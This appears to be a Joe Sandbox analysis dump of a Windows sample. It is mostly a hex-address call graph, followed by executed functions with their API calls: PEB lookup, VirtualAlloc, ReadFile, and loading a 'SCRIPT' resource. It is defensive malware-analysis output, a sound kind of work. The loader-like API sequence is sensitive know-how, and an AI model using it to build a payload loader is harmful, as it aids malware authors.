98165->98160 98166 98fe73 98173 99ceb1 98166->98173 98168 98fe89 98182 99cf92 98168->98182 98170 98feb3 98194 9f359c 82 API calls __wsopen_s 98170->98194 98172 9d4ab8 98174 99cebf 98173->98174 98175 99ced2 98173->98175 98195 98aceb 23 API calls messages 98174->98195 98177 99cf05 98175->98177 98178 99ced7 98175->98178 98196 98aceb 23 API calls messages 98177->98196 98180 99fddb 22 API calls 98178->98180 98181 99cec9 98180->98181 98181->98168 98183 986270 22 API calls 98182->98183 98184 99cfc9 98183->98184 98185 989cb3 22 API calls 98184->98185 98187 99cffa 98184->98187 98186 9dd166 98185->98186 98188 986350 22 API calls 98186->98188 98187->98170 98189 9dd171 98188->98189 98197 99d2f0 40 API calls 98189->98197 98191 9dd184 98193 9dd188 98191->98193 98198 98aceb 23 API calls messages 98191->98198 98193->98193 98194->98172 98195->98181 98196->98181 98197->98191 98198->98193 98199 96295b 98200 962962 98199->98200 98201 962a00 98200->98201 98202 96296a 98200->98202 98219 9632b0 9 API calls 98201->98219 98206 962610 98202->98206 98205 9629e7 98207 960000 GetPEB 98206->98207 98216 9626af 98207->98216 98209 9626e0 CreateFileW 98212 9626ed 98209->98212 98209->98216 98210 962709 VirtualAlloc 98211 96272a ReadFile 98210->98211 98210->98212 98211->98212 98215 962748 VirtualAlloc 98211->98215 98213 9628fc VirtualFree 98212->98213 98214 96290a 98212->98214 98213->98214 98214->98205 98215->98212 98215->98216 98216->98210 98216->98212 98217 962810 FindCloseChangeNotification 98216->98217 98218 962820 VirtualFree 98216->98218 98220 963520 GetPEB 98216->98220 98217->98216 98218->98216 98219->98205 98221 96354a 98220->98221 98221->98209 98222 983156 98225 983170 98222->98225 98226 983187 98225->98226 98227 9831eb 98226->98227 98228 98318c 98226->98228 98264 9831e9 98226->98264 98232 9c2dfb 98227->98232 98233 9831f1 98227->98233 98229 983199 98228->98229 98230 983265 PostQuitMessage 98228->98230 98235 9c2e7c 98229->98235 98236 9831a4 98229->98236 98267 98316a 98230->98267 98231 9831d0 DefWindowProcW 98231->98267 98274 9818e2 10 API calls 98232->98274 98237 9831f8 98233->98237 98238 98321d SetTimer RegisterWindowMessageW 98233->98238 98289 9ebf30 34 API calls ___scrt_fastfail 98235->98289 98240 9c2e68 98236->98240 98241 9831ae 98236->98241 98244 9c2d9c 98237->98244 98245 983201 KillTimer 98237->98245 98242 983246 CreatePopupMenu 98238->98242 98238->98267 98239 9c2e1c 98275 99e499 42 API calls 98239->98275 98288 9ec161 27 API calls ___scrt_fastfail 98240->98288 98248 9c2e4d 98241->98248 98249 9831b9 98241->98249 98242->98267 98251 9c2dd7 MoveWindow 98244->98251 98252 9c2da1 98244->98252 98270 9830f2 Shell_NotifyIconW ___scrt_fastfail 98245->98270 98248->98231 98287 9e0ad7 22 API calls 98248->98287 98256 9831c4 98249->98256 98257 983253 98249->98257 98250 9c2e8e 98250->98231 98250->98267 98251->98267 98258 9c2dc6 SetFocus 98252->98258 98259 9c2da7 98252->98259 98254 983214 98271 983c50 DeleteObject DestroyWindow 98254->98271 98255 983263 98255->98267 98256->98231 98276 9830f2 Shell_NotifyIconW ___scrt_fastfail 98256->98276 98272 98326f 44 API calls ___scrt_fastfail 98257->98272 98258->98267 98259->98256 98262 9c2db0 98259->98262 98273 9818e2 10 API calls 98262->98273 98264->98231 98268 9c2e41 98277 983837 98268->98277 98270->98254 98271->98267 98272->98255 98273->98267 98274->98239 98275->98256 98276->98268 98278 983862 ___scrt_fastfail 98277->98278 98290 984212 98278->98290 98281 9838e8 98283 9c3386 Shell_NotifyIconW 98281->98283 98284 983906 Shell_NotifyIconW 98281->98284 98294 983923 98284->98294 98286 98391c 98286->98264 98287->98264 98288->98255 98289->98250 98291 9c35a4 98290->98291 98292 9838b7 98290->98292 98291->98292 98293 9c35ad DestroyIcon 98291->98293 98292->98281 98316 9ec874 42 API calls _strftime 98292->98316 98293->98292 98295 98393f 98294->98295 98296 983a13 98294->98296 98297 986270 22 API calls 98295->98297 98296->98286 98298 98394d 98297->98298 98299 98395a 98298->98299 98300 9c3393 LoadStringW 98298->98300 98301 986b57 22 API calls 98299->98301 98302 9c33ad 98300->98302 98303 98396f 98301->98303 98306 98a8c7 22 API calls 98302->98306 98310 983994 ___scrt_fastfail 98302->98310 98304 98397c 98303->98304 98305 9c33c9 98303->98305 98304->98302 98307 983986 98304->98307 98308 986350 22 API calls 98305->98308 98306->98310 98309 986350 22 API calls 98307->98309 98311 9c33d7 98308->98311 98309->98310 98313 9839f9 Shell_NotifyIconW 98310->98313 98311->98310 98312 9833c6 22 API calls 98311->98312 98314 9c33f9 98312->98314 98313->98296 98315 9833c6 22 API calls 98314->98315 98315->98310 98316->98281 98317 982e37 98318 98a961 22 API calls 98317->98318 98319 982e4d 98318->98319 98396 984ae3 98319->98396 98321 982e6b 98322 983a5a 24 API calls 98321->98322 98323 982e7f 98322->98323 98324 989cb3 22 API calls 98323->98324 98325 982e8c 98324->98325 98326 984ecb 94 API calls 98325->98326 98327 982ea5 98326->98327 98328 982ead 98327->98328 98329 9c2cb0 98327->98329 98333 98a8c7 22 API calls 98328->98333 98426 9f2cf9 98329->98426 98331 9c2cc3 98332 9c2ccf 98331->98332 98334 984f39 68 API calls 98331->98334 98337 984f39 68 API calls 98332->98337 98335 982ec3 98333->98335 98334->98332 98410 986f88 22 API calls 98335->98410 98339 9c2ce5 98337->98339 98338 982ecf 98340 989cb3 22 API calls 98338->98340 98452 983084 22 API calls 98339->98452 98341 982edc 98340->98341 98411 98a81b 41 API calls 98341->98411 98343 982eec 98346 989cb3 22 API calls 98343->98346 98345 9c2d02 98453 983084 22 API calls 98345->98453 98348 982f12 98346->98348 98412 98a81b 41 API calls 98348->98412 98349 9c2d1e 98351 983a5a 24 API calls 98349->98351 98352 9c2d44 98351->98352 98454 983084 22 API calls 98352->98454 98353 982f21 98356 98a961 22 API calls 98353->98356 98355 9c2d50 98357 98a8c7 22 API calls 98355->98357 98358 982f3f 98356->98358 98359 9c2d5e 98357->98359 98413 983084 22 API calls 98358->98413 98455 983084 22 API calls 98359->98455 98361 982f4b 98414 9a4a28 40 API calls 2 library calls 98361->98414 98364 9c2d6d 98368 98a8c7 22 API calls 98364->98368 98365 982f59 98365->98339 98366 982f63 98365->98366 98415 9a4a28 40 API calls 2 library calls 98366->98415 98369 9c2d83 98368->98369 98456 983084 22 API calls 98369->98456 98370 982f6e 98370->98345 98372 982f78 98370->98372 98416 9a4a28 40 API calls 2 library calls 98372->98416 98373 9c2d90 98375 982f83 98375->98349 98376 982f8d 98375->98376 98417 9a4a28 40 API calls 2 library calls 98376->98417 98378 982f98 98379 982fdc 98378->98379 98418 983084 22 API calls 98378->98418 98379->98364 98380 982fe8 98379->98380 98380->98373 98420 9863eb 22 API calls 98380->98420 98382 982fbf 98384 98a8c7 22 API calls 98382->98384 98386 982fcd 98384->98386 98385 982ff8 98421 986a50 22 API calls 98385->98421 98419 983084 22 API calls 98386->98419 98389 983006 98422 9870b0 23 API calls 98389->98422 98393 983021 98394 983065 98393->98394 98423 986f88 22 API calls 98393->98423 98424 9870b0 23 API calls 98393->98424 98425 983084 22 API calls 98393->98425 98397 984af0 __wsopen_s 98396->98397 98398 986b57 22 API calls 98397->98398 98399 984b22 98397->98399 98398->98399 98400 984c6d 22 API calls 98399->98400 98409 984b58 98399->98409 98400->98399 98401 989cb3 22 API calls 98403 984c52 98401->98403 98402 989cb3 22 API calls 98402->98409 98405 98515f 22 API calls 98403->98405 98404 984c6d 22 API calls 98404->98409 98407 984c5e 98405->98407 98406 98515f 22 API calls 98406->98409 98407->98321 98408 984c29 98408->98401 98408->98407 98409->98402 98409->98404 98409->98406 98409->98408 98410->98338 98411->98343 98412->98353 98413->98361 98414->98365 98415->98370 98416->98375 98417->98378 98418->98382 98419->98379 98420->98385 98421->98389 98422->98393 98423->98393 98424->98393 98425->98393 98427 9f2d15 98426->98427 98428 98511f 64 API calls 98427->98428 98429 9f2d29 98428->98429 98430 9f2e66 75 API calls 98429->98430 98431 9f2d3b 98430->98431 98432 9f2d3f 98431->98432 98433 9850f5 40 API calls 98431->98433 98432->98331 98434 9f2d56 98433->98434 98435 9850f5 40 API calls 98434->98435 98436 9f2d66 98435->98436 98437 9850f5 40 API calls 98436->98437 98438 9f2d81 98437->98438 98439 9850f5 40 API calls 98438->98439 98440 9f2d9c 98439->98440 98441 98511f 64 API calls 98440->98441 98442 9f2db3 98441->98442 98443 9aea0c ___std_exception_copy 21 API calls 98442->98443 98444 9f2dba 98443->98444 98445 9aea0c ___std_exception_copy 21 API calls 98444->98445 98446 9f2dc4 98445->98446 98447 9850f5 40 API calls 98446->98447 98448 9f2dd8 98447->98448 98449 9f28fe 27 API calls 98448->98449 98450 9f2dee 98449->98450 98450->98432 98451 9f22ce 79 API calls 98450->98451 98451->98432 98452->98345 98453->98349 98454->98355 98455->98364 98456->98373 98457 981cad SystemParametersInfoW 98458 9b8402 98463 9b81be 98458->98463 98461 9b842a 98464 9b81ef try_get_first_available_module 98463->98464 98471 9b8338 98464->98471 98478 9a8e0b 40 API calls 2 library calls 98464->98478 98466 9b83ee 98482 9b27ec 26 API calls _strftime 98466->98482 98468 9b8343 98468->98461 98475 9c0984 98468->98475 98470 9b838c 98470->98471 98479 9a8e0b 40 API calls 2 library calls 98470->98479 98471->98468 98481 9af2d9 20 API calls __dosmaperr 98471->98481 98473 9b83ab 98473->98471 98480 9a8e0b 40 API calls 2 library calls 98473->98480 98483 9c0081 98475->98483 98477 9c099f 98477->98461 98478->98470 98479->98473 98480->98471 98481->98466 98482->98468 98485 9c008d BuildCatchObjectHelperInternal 98483->98485 98484 9c009b 98540 9af2d9 20 API calls __dosmaperr 98484->98540 98485->98484 98487 9c00d4 98485->98487 98494 9c065b 98487->98494 98488 9c00a0 98541 9b27ec 26 API calls _strftime 98488->98541 98493 9c00aa __fread_nolock 98493->98477 98495 9c0678 98494->98495 98496 9c068d 98495->98496 98497 9c06a6 98495->98497 98557 9af2c6 20 API calls __dosmaperr 98496->98557 98543 9b5221 98497->98543 98500 9c0692 98558 9af2d9 20 API calls __dosmaperr 98500->98558 98501 9c06ab 98502 9c06cb 98501->98502 98503 9c06b4 98501->98503 98556 9c039a CreateFileW 98502->98556 98559 9af2c6 20 API calls __dosmaperr 98503->98559 98507 9c06b9 98560 9af2d9 20 API calls __dosmaperr 98507->98560 98508 9c0781 GetFileType 98511 9c078c GetLastError 98508->98511 98512 9c07d3 98508->98512 98510 9c0756 GetLastError 98562 9af2a3 20 API calls __dosmaperr 98510->98562 98563 9af2a3 20 API calls __dosmaperr 98511->98563 98565 9b516a 21 API calls 2 library calls 98512->98565 98513 9c0704 98513->98508 98513->98510 98561 9c039a CreateFileW 98513->98561 98517 9c079a CloseHandle 98517->98500 98518 9c07c3 98517->98518 98564 9af2d9 20 API calls __dosmaperr 98518->98564 98520 9c0749 98520->98508 98520->98510 98522 9c07f4 98524 9c0840 98522->98524 98566 9c05ab 72 API calls 3 library calls 98522->98566 98523 9c07c8 98523->98500 98528 9c086d 98524->98528 98567 9c014d 72 API calls 4 library calls 98524->98567 98527 9c0866 98527->98528 98530 9c087e 98527->98530 98529 9b86ae __wsopen_s 29 API calls 98528->98529 98531 9c00f8 98529->98531 98530->98531 98532 9c08fc CloseHandle 98530->98532 98542 9c0121 LeaveCriticalSection __wsopen_s 98531->98542 98568 9c039a CreateFileW 98532->98568 98534 9c0927 98535 9c0931 GetLastError 98534->98535 98536 9c095d 98534->98536 98569 9af2a3 20 API calls __dosmaperr 98535->98569 98536->98531 98538 9c093d 98570 9b5333 21 API calls 2 library calls 98538->98570 98540->98488 98541->98493 98542->98493 98544 9b522d BuildCatchObjectHelperInternal 98543->98544 98571 9b2f5e EnterCriticalSection 98544->98571 98547 9b5259 98550 9b5000 __wsopen_s 21 API calls 98547->98550 98548 9b5234 98548->98547 98552 9b52c7 EnterCriticalSection 98548->98552 98554 9b527b 98548->98554 98549 9b52a4 __fread_nolock 98549->98501 98551 9b525e 98550->98551 98551->98554 98575 9b5147 EnterCriticalSection 98551->98575 98552->98554 98555 9b52d4 LeaveCriticalSection 98552->98555 98572 9b532a 98554->98572 98555->98548 98556->98513 98557->98500 98558->98531 98559->98507 98560->98500 98561->98520 98562->98500 98563->98517 98564->98523 98565->98522 98566->98524 98567->98527 98568->98534 98569->98538 98570->98536 98571->98548 98576 9b2fa6 LeaveCriticalSection 98572->98576 98574 9b5331 98574->98549 98575->98554 98576->98574 98577 9c2ba5 98578 9c2baf 98577->98578 98579 982b25 98577->98579 98581 983a5a 24 API calls 98578->98581 98605 982b83 7 API calls 98579->98605 98583 9c2bb8 98581->98583 98585 989cb3 22 API calls 98583->98585 98586 9c2bc6 98585->98586 98588 9c2bce 98586->98588 98589 9c2bf5 98586->98589 98587 982b2f 98590 983837 49 API calls 98587->98590 98595 982b44 98587->98595 98591 9833c6 22 API calls 98588->98591 98592 9833c6 22 API calls 98589->98592 98590->98595 98593 9c2bd9 98591->98593 98603 9c2bf1 GetForegroundWindow ShellExecuteW 98592->98603 98594 986350 22 API calls 98593->98594 98598 9c2be7 98594->98598 98596 982b5f 98595->98596 98609 9830f2 Shell_NotifyIconW ___scrt_fastfail 98595->98609 98602 982b66 SetCurrentDirectoryW 98596->98602 98601 9833c6 22 API calls 98598->98601 98600 9c2c26 98600->98596 98601->98603 98604 982b7a 98602->98604 98603->98600 98610 982cd4 7 API calls 98605->98610 98607 982b2a 98608 982c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98607->98608 98608->98587 98609->98596 98610->98607 98611 982de3 98612 982df0 __wsopen_s 98611->98612 98613 982e09 98612->98613 98614 9c2c2b ___scrt_fastfail 98612->98614 98615 983aa2 23 API calls 98613->98615 98616 9c2c47 GetOpenFileNameW 98614->98616 98617 982e12 98615->98617 98618 9c2c96 98616->98618 98627 982da5 98617->98627 98620 986b57 22 API calls 98618->98620 98623 9c2cab 98620->98623 98623->98623 98624 982e27 98645 9844a8 98624->98645 98628 9c1f50 __wsopen_s 98627->98628 98629 982db2 GetLongPathNameW 98628->98629 98630 986b57 22 API calls 98629->98630 98631 982dda 98630->98631 98632 983598 98631->98632 98633 98a961 22 API calls 98632->98633 98634 9835aa 98633->98634 98635 983aa2 23 API calls 98634->98635 98636 9835b5 98635->98636 98637 9c32eb 98636->98637 98638 9835c0 98636->98638 98642 9c330d 98637->98642 98680 99ce60 41 API calls 98637->98680 98640 98515f 22 API calls 98638->98640 98641 9835cc 98640->98641 98674 9835f3 98641->98674 98644 9835df 98644->98624 98646 984ecb 94 API calls 98645->98646 98647 9844cd 98646->98647 98648 9c3833 98647->98648 98649 984ecb 94 API calls 98647->98649 98650 9f2cf9 80 API calls 98648->98650 98651 9844e1 98649->98651 98652 9c3848 98650->98652 98651->98648 98653 9844e9 98651->98653 98654 9c384c 98652->98654 98655 9c3869 98652->98655 98657 9c3854 98653->98657 98658 9844f5 98653->98658 98659 984f39 68 API calls 98654->98659 98656 99fe0b 22 API calls 98655->98656 98664 9c38ae 98656->98664 98696 9eda5a 82 API calls 98657->98696 98695 98940c 136 API calls 2 library calls 98658->98695 98659->98657 98662 9c3862 98662->98655 98663 982e31 98666 9c3a5f 98664->98666 98671 989cb3 22 API calls 98664->98671 98681 98a4a1 98664->98681 98689 983ff7 98664->98689 98697 9e967e 22 API calls __fread_nolock 98664->98697 98698 9e95ad 42 API calls _wcslen 98664->98698 98699 9f0b5a 22 API calls 98664->98699 98665 984f39 68 API calls 98665->98666 98666->98665 98700 9e989b 82 API calls __wsopen_s 98666->98700 98671->98664 98675 983605 98674->98675 98679 983624 __fread_nolock 98674->98679 98678 99fe0b 22 API calls 98675->98678 98676 99fddb 22 API calls 98677 98363b 98676->98677 98677->98644 98678->98679 98679->98676 98680->98637 98682 98a52b 98681->98682 98687 98a4b1 __fread_nolock 98681->98687 98684 99fe0b 22 API calls 98682->98684 98683 99fddb 22 API calls 98685 98a4b8 98683->98685 98684->98687 98686 99fddb 22 API calls 98685->98686 98688 98a4d6 98685->98688 98686->98688 98687->98683 98688->98664 98690 98400a 98689->98690 98693 9840ae 98689->98693 98691 99fe0b 22 API calls 98690->98691 98694 98403c 98690->98694 98691->98694 98692 99fddb 22 API calls 98692->98694 98693->98664 98694->98692 98694->98693 98695->98663 98696->98662 98697->98664 98698->98664 98699->98664 98700->98666 98701 981044 98706 9810f3 98701->98706 98703 98104a 98742 9a00a3 29 API calls __onexit 98703->98742 98705 981054 98743 981398 98706->98743 98710 98116a 98711 98a961 22 API calls 98710->98711 98712 981174 98711->98712 98713 98a961 22 API calls 98712->98713 98714 98117e 98713->98714 98715 98a961 22 API calls 98714->98715 98716 981188 98715->98716 98717 98a961 22 API calls 98716->98717 98718 9811c6 98717->98718 98719 98a961 22 API calls 98718->98719 98720 981292 98719->98720 98753 98171c 98720->98753 98724 9812c4 98725 98a961 22 API calls 98724->98725 98726 9812ce 98725->98726 98727 991940 9 API calls 98726->98727 98728 9812f9 98727->98728 98774 981aab 98728->98774 98730 981315 98731 981325 GetStdHandle 98730->98731 98732 98137a 98731->98732 98733 9c2485 98731->98733 98736 981387 OleInitialize 98732->98736 98733->98732 98734 9c248e 98733->98734 98735 99fddb 22 API calls 98734->98735 98737 9c2495 98735->98737 98736->98703 98781 9f011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98737->98781 98739 9c249e 98782 9f0944 CreateThread 98739->98782 98741 9c24aa CloseHandle 98741->98732 98742->98705 98783 9813f1 98743->98783 98746 9813f1 22 API calls 98747 9813d0 98746->98747 98748 98a961 22 API calls 98747->98748 98749 9813dc 98748->98749 98750 986b57 22 API calls 98749->98750 98751 981129 98750->98751 98752 981bc3 6 API calls 98751->98752 98752->98710 98754 98a961 22 API calls 98753->98754 98755 98172c 98754->98755 98756 98a961 22 API calls 98755->98756 98757 981734 98756->98757 98758 98a961 22 API calls 98757->98758 98759 98174f 98758->98759 98760 99fddb 22 API calls 98759->98760 98761 98129c 98760->98761 98762 981b4a 98761->98762 98763 981b58 98762->98763 98764 98a961 22 API calls 98763->98764 98765 981b63 98764->98765 98766 98a961 22 API calls 98765->98766 98767 981b6e 98766->98767 98768 98a961 22 API calls 98767->98768 98769 981b79 98768->98769 98770 98a961 22 API calls 98769->98770 98771 981b84 98770->98771 98772 99fddb 22 API calls 98771->98772 98773 981b96 RegisterWindowMessageW 98772->98773 98773->98724 98775 9c272d 98774->98775 98776 981abb 98774->98776 98790 9f3209 23 API calls 98775->98790 98778 99fddb 22 API calls 98776->98778 98779 981ac3 98778->98779 98779->98730 98780 9c2738 98781->98739 98782->98741 98791 9f092a 28 API calls 98782->98791 98784 98a961 22 API calls 98783->98784 98785 9813fc 98784->98785 98786 98a961 22 API calls 98785->98786 98787 981404 98786->98787 98788 98a961 22 API calls 98787->98788 98789 9813c6 98788->98789 98789->98746 98790->98780 98792 9d2a00 98820 98d7b0 messages 98792->98820 98793 98db11 PeekMessageW 98793->98820 98794 98d807 GetInputState 98794->98793 98794->98820 98796 9d1cbe TranslateAcceleratorW 98796->98820 98797 98db8f PeekMessageW 98797->98820 98798 98db73 TranslateMessage DispatchMessageW 98798->98797 98799 98da04 timeGetTime 98799->98820 98800 98dbaf Sleep 98816 98dbc0 98800->98816 98801 9d2b74 Sleep 98801->98816 98802 9d1dda timeGetTime 98856 99e300 23 API calls 98802->98856 98803 99e551 timeGetTime 98803->98816 98806 9d2c0b GetExitCodeProcess 98809 9d2c37 CloseHandle 98806->98809 98810 9d2c21 WaitForSingleObject 98806->98810 98807 a129bf GetForegroundWindow 98807->98816 98809->98816 98810->98809 98810->98820 98811 9d2a31 98812 98d9d5 98811->98812 98813 9d2ca9 Sleep 98813->98820 98816->98803 98816->98806 98816->98807 98816->98811 98816->98812 98816->98813 98816->98820 98859 a05658 23 API calls 98816->98859 98860 9ee97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98816->98860 98861 9ed4dc 47 API calls 98816->98861 98819 98ec40 256 API calls 98819->98820 98820->98793 98820->98794 98820->98796 98820->98797 98820->98798 98820->98799 98820->98800 98820->98801 98820->98802 98820->98812 98820->98819 98822 991310 256 API calls 98820->98822 98824 98dd50 98820->98824 98831 98dfd0 98820->98831 98854 98bf40 256 API calls 2 library calls 98820->98854 98855 99edf6 IsDialogMessageW GetClassLongW 98820->98855 98857 9f3a2a 23 API calls 98820->98857 98858 9f359c 82 API calls __wsopen_s 98820->98858 98822->98820 98825 98dd6f 98824->98825 98826 98dd83 98824->98826 98862 98d260 256 API calls 2 library calls 98825->98862 98863 9f359c 82 API calls __wsopen_s 98826->98863 98828 98dd7a 98828->98820 98830 9d2f75 98830->98830 98832 98e010 98831->98832 98847 98e0dc messages 98832->98847 98866 9a0242 5 API calls __Init_thread_wait 98832->98866 98835 9d2fca 98837 98a961 22 API calls 98835->98837 98835->98847 98836 98a961 22 API calls 98836->98847 98838 9d2fe4 98837->98838 98867 9a00a3 29 API calls __onexit 98838->98867 98842 9d2fee 98868 9a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98842->98868 98844 98ec40 256 API calls 98844->98847 98847->98836 98847->98844 98848 98a8c7 22 API calls 98847->98848 98849 9904f0 22 API calls 98847->98849 98850 98e3e1 98847->98850 98851 9f359c 82 API calls 98847->98851 98864 98a81b 41 API calls 98847->98864 98865 99a308 256 API calls 98847->98865 98869 9a0242 5 API calls __Init_thread_wait 98847->98869 98870 9a00a3 29 API calls __onexit 98847->98870 98871 9a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98847->98871 98872 a047d4 256 API calls 98847->98872 98873 a068c1 256 API calls 98847->98873 98848->98847 98849->98847 98850->98820 98851->98847 98854->98820 98855->98820 98856->98820 98857->98820 98858->98820 98859->98816 98860->98816 98861->98816 98862->98828 98863->98830 98864->98847 98865->98847 98866->98835 98867->98842 98868->98847 98869->98847 98870->98847 98871->98847 98872->98847 98873->98847

                        Executed Functions

                        Function 009842DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 234 9842de-98434d call 98a961 GetVersionExW call 986b57 239 9c3617-9c362a 234->239 240 984353 234->240 242 9c362b-9c362f 239->242 241 984355-984357 240->241 243 98435d-9843bc call 9893b2 call 9837a0 241->243 244 9c3656 241->244 245 9c3631 242->245 246 9c3632-9c363e 242->246 263 9c37df-9c37e6 243->263 264 9843c2-9843c4 243->264 250 9c365d-9c3660 244->250 245->246 246->242 247 9c3640-9c3642 246->247 247->241 249 9c3648-9c364f 247->249 249->239 252 9c3651 249->252 253 98441b-984435 GetCurrentProcess IsWow64Process 250->253 254 9c3666-9c36a8 250->254 252->244 256 984494-98449a 253->256 257 984437 253->257 254->253 258 9c36ae-9c36b1 254->258 260 98443d-984449 256->260 257->260 261 9c36db-9c36e5 258->261 262 9c36b3-9c36bd 258->262 265 98444f-98445e LoadLibraryA 260->265 266 9c3824-9c3828 GetSystemInfo 260->266 270 9c36f8-9c3702 261->270 271 9c36e7-9c36f3 261->271 267 9c36bf-9c36c5 262->267 268 9c36ca-9c36d6 262->268 272 9c37e8 263->272 273 9c3806-9c3809 263->273 264->250 269 9843ca-9843dd 264->269 276 98449c-9844a6 GetSystemInfo 265->276 277 984460-98446e GetProcAddress 265->277 267->253 268->253 278 9c3726-9c372f 269->278 279 9843e3-9843e5 269->279 281 9c3704-9c3710 270->281 282 9c3715-9c3721 270->282 271->253 280 9c37ee 272->280 274 9c380b-9c381a 273->274 275 9c37f4-9c37fc 273->275 274->280 285 9c381c-9c3822 274->285 275->273 287 984476-984478 276->287 277->276 286 984470-984474 GetNativeSystemInfo 277->286 283 9c373c-9c3748 278->283 284 9c3731-9c3737 278->284 288 9c374d-9c3762 279->288 289 9843eb-9843ee 279->289 280->275 281->253 282->253 283->253 284->253 285->275 286->287 292 98447a-98447b FreeLibrary 287->292 293 984481-984493 287->293 290 9c376f-9c377b 288->290 291 9c3764-9c376a 288->291 294 9843f4-98440f 289->294 295 9c3791-9c3794 289->295 290->253 291->253 292->293 296 9c3780-9c378c 294->296 297 984415 294->297 295->253 298 9c379a-9c37c1 295->298 296->253 297->253 299 9c37ce-9c37da 298->299 300 9c37c3-9c37c9 298->300 299->253 300->253
                        APIs
                        • GetVersionExW.KERNEL32(?), ref: 0098430D
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                        • GetCurrentProcess.KERNEL32(?,00A1CB64,00000000,?,?), ref: 00984422
                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00984429
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00984454
                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00984466
                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00984474
                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0098447B
                        • GetSystemInfo.KERNEL32(?,?,?), ref: 009844A0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                        • API String ID: 3290436268-3101561225
                        • Opcode ID: fc97420d1b7fe941566ef820b6059a3e66487d6d04590a53ae1c73d25056773e
                        • Instruction ID: a7f3b2edaddff4581508c78fa4031abf1fbf7012244f5d541d93ad510794f461
                        • Opcode Fuzzy Hash: fc97420d1b7fe941566ef820b6059a3e66487d6d04590a53ae1c73d25056773e
                        • Instruction Fuzzy Hash: 5AA1816190E3C1DFC791D7F9B8A17B57FE87F26366B08889DD0419BB22D224450BDB22
                        Function 009842A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 661 9842a2-9842ba CreateStreamOnHGlobal 662 9842da-9842dd 661->662 663 9842bc-9842d3 FindResourceExW 661->663 664 9842d9 663->664 665 9c35ba-9c35c9 LoadResource 663->665 664->662 665->664 666 9c35cf-9c35dd SizeofResource 665->666 666->664 667 9c35e3-9c35ee LockResource 666->667 667->664 668 9c35f4-9c3612 667->668 668->664
                        APIs
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009850AA,?,?,00000000,00000000), ref: 009842B2
                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009850AA,?,?,00000000,00000000), ref: 009842C9
                        • LoadResource.KERNEL32(?,00000000,?,?,009850AA,?,?,00000000,00000000,?,?,?,?,?,?,00984F20), ref: 009C35BE
                        • SizeofResource.KERNEL32(?,00000000,?,?,009850AA,?,?,00000000,00000000,?,?,?,?,?,?,00984F20), ref: 009C35D3
                        • LockResource.KERNEL32(009850AA,?,?,009850AA,?,?,00000000,00000000,?,?,?,?,?,?,00984F20,?), ref: 009C35E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                        • String ID: SCRIPT
                        • API String ID: 3051347437-3967369404
                        • Opcode ID: fbff5863f52f1426839a65224fc1f1a1ea73fb8c79b22aab6147a394f579019e
                        • Instruction ID: 00ae363332aad2e73e4c5a76ebbc77ce8a94a154d11c1ed47845b750edbae52f
                        • Opcode Fuzzy Hash: fbff5863f52f1426839a65224fc1f1a1ea73fb8c79b22aab6147a394f579019e
                        • Instruction Fuzzy Hash: C511AC70244305BFD721ABA5DC48FA77BBDEFC9B65F108169B412C6290DB71D8008620
                        Function 009C2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00982B6B
                          • Part of subcall function 00983A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A51418,?,00982E7F,?,?,?,00000000), ref: 00983A78
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
